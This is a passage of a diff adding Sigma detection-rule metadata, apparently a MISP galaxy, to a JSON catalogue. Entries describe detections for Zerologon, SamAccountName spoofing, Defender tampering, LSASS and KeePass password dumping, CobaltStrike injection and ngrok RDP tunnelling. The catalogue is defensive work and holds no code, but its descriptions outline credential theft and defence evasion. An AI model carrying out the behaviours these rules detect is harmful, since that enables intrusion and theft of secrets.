Connection Allowed", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2020/09/15", + "filename": "win_system_vul_cve_2020_1472.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "value": "Exploit SamAccountName Spoofing with Kerberos", + "meta": { + "refs": [ + "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2021/12/15", + "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", + "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", + "value": "Rare Scheduled Task Creations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.s0111", + "attack.t1053.005" + ], + "creation_date": "2017/03/17", + "filename": "win_rare_schtask_creation.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Software installation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", + "value": "Suspicious Scheduled Tasks Locations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_task_scheduler_susp_task_locations.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "value": "Ngrok Usage with Remote Desktop Service", + "meta": { + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://ngrok.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/04/29", + "filename": "win_terminalservices_rdp_ngrok.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Access to LSASS Process", + "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "value": "LSASS Access Detected via Attack Surface Reduction", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2018/08/26", + "filename": "win_defender_alert_lsass_access.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects triggering of AMSI by Windows Defender.", + "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "value": "Windows Defender AMSI Trigger Detected", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/09/14", + "filename": "win_defender_amsi_trigger.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender threat protection", + "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "value": "Windows Defender Threat Detection Disabled", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/07/28", + "filename": "win_defender_disabled.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd, frack113", + "level": "low", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "value": "Windows Defender Exclusions Added", + "meta": { + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/06", + "filename": "win_defender_exclusions.yml", + "author": "Christian Burkard", + "level": "medium", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "value": "Windows Defender Exploit Guard Tamper", + "meta": { + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/08/05", + "filename": "win_defender_exploit_guard_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", + "value": "Windows Defender Malware Detection History Deletion", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ], + "creation_date": "2020/08/13", + "filename": "win_defender_history_delete.yml", + "author": "Cian Heasley", + "level": "high", + "falsepositive": [ + "Deletion of Defender malware detections history for legitimate reasons" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "value": "PSExec and WMI Process Creations Block", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", + "https://twitter.com/duff22b/status/1280166329660497920", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" + ], + "creation_date": "2020/07/14", + "filename": "win_defender_psexec_wmi_asr.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection", + "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", + "value": "Microsoft Defender Tamper Protection Trigger", + "meta": { + "refs": [ + "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/05", + "filename": "win_defender_tamper_protection_trigger.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects all actions taken by Windows Defender malware detection engines", + "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "value": "Windows Defender Threat Detected", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/07/28", + "filename": "win_defender_threat.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "value": "WMI Persistence", + "meta": { + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ], + "creation_date": "2017/08/22", + "filename": "win_wmi_persistence.yml", + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "value": "Bumblebee Remote Thread Creation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ], + "creation_date": "2022/09/27", + "filename": "create_remote_thread_win_bumblebee.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "value": "CACTUSTORCH Remote Thread Creation", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" + ], + "creation_date": "2019/02/01", + "filename": "create_remote_thread_win_cactustorch.yml", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "value": "CobaltStrike Process Injection", + "meta": { + "refs": [ + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2018/11/30", + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "value": "CreateRemoteThread API and LoadLibrary", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2019/08/11", + "filename": "create_remote_thread_win_loadlibrary.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "value": "KeePass Password Dumping", + "meta": { + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", + "https://github.com/denandz/KeeFarce", + "https://github.com/GhostPack/KeeThief", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.005" + ], + "creation_date": "2022/04/22", + "filename": "create_remote_thread_win_password_dumper_keepass.yml", + "author": "Timon Hackenjos", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "value": "Password Dumper Remote Thread in LSASS", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" + ], + "creation_date": "2017/02/19", + "filename": "create_remote_thread_win_password_dumper_lsass.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Antivirus products" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "value": "Accessing WinAPI in PowerShell. Code Injection", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/06", + "filename": "create_remote_thread_win_powershell_code_injection.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell remote thread creation in Rundll32.exe", + "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "value": "PowerShell Rundll32 Remote Thread Creation", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ], + "creation_date": "2018/06/25", + "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119", + "value": "Suspicious Remote Thread Source", + "meta": { + "refs": [ + "Personal research, statistical analysis", + "https://lolbas-project.github.io", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2019/10/27", + "filename": "create_remote_thread_win_susp_remote_thread_source.yml", + "author": "Perez Diego (@darkquassar), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "uuid": "f016c716-754a-467f-a39e-63c06f773987", + "value": "Suspicious Remote Thread Target", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml" + ], + "tags": "No established tags", + "creation_date": "2022/08/25", + "filename": "create_remote_thread_win_susp_remote_thread_target.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects a remote thread creation in suspicious target images", + "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "value": "Remote Thread Creation in Suspicious Targets", + "meta": { + "refs": [ + "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" + ], + "creation_date": "2022/03/16", + "filename": "create_remote_thread_win_susp_targets.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "value": "Remote Thread Creation Ttdinject.exe Proxy", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/16", + "filename": "create_remote_thread_win_ttdinjec.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "value": "Executable in ADS", + "meta": { + "refs": [ + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2018/06/03", + "filename": "create_stream_hash_ads_executable.yml", + "author": "Florian Roth, @0xrawsec", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "uuid": "573df571-a223-43bc-846e-3f98da481eca", + "value": "Creation Of a Suspicious ADS File Outside a Browser Download", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/10/22", + "filename": "create_stream_hash_creation_internet_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", + "value": "Hacktool Download", + "meta": { + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2022/08/24", + "filename": "create_stream_hash_hacktool_download.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "value": "Exports Registry Key To an Alternate Data Stream", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2020/10/07", + "filename": "create_stream_hash_regedit_export_to_ads.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "value": "Suspicious File Download from File Sharing Domain", + "meta": { + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2022/08/24", + "filename": "create_stream_hash_susp_domain_ext_combo.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "value": "Unusual File Download from File Sharing Domain", + "meta": { + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2022/08/24", + "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the download of suspicious file type from URLs with IP", + "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "value": "Unusual File Download from Direct IP Address", + "meta": { + "refs": [ + "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/09/07", + "filename": "create_stream_hash_susp_ip_domains.yml", + "author": "Nasreddine Bencherchali, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", + "value": "Query To Remote Access Software Domain", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/07/11", + "filename": "dns_query_remote_access_software_domains.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "FP may be caused in legitimate usage of the softwares mentioned above" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "uuid": "065cceea-77ec-4030-9052-fc0affea7110", + "value": "DNS Query for Anonfiles.com Domain", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2022/07/15", + "filename": "dns_query_win_anonymfiles_com.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Legitimate access to anonfiles.com" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", + "value": "DNS HybridConnectionManager Service Bus", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ], + "creation_date": "2021/04/12", + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", + "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppInstaller Attempts From URL by DNS", + "meta": { + "refs": [ + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/24", + "filename": "dns_query_win_lobas_appinstaller.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + 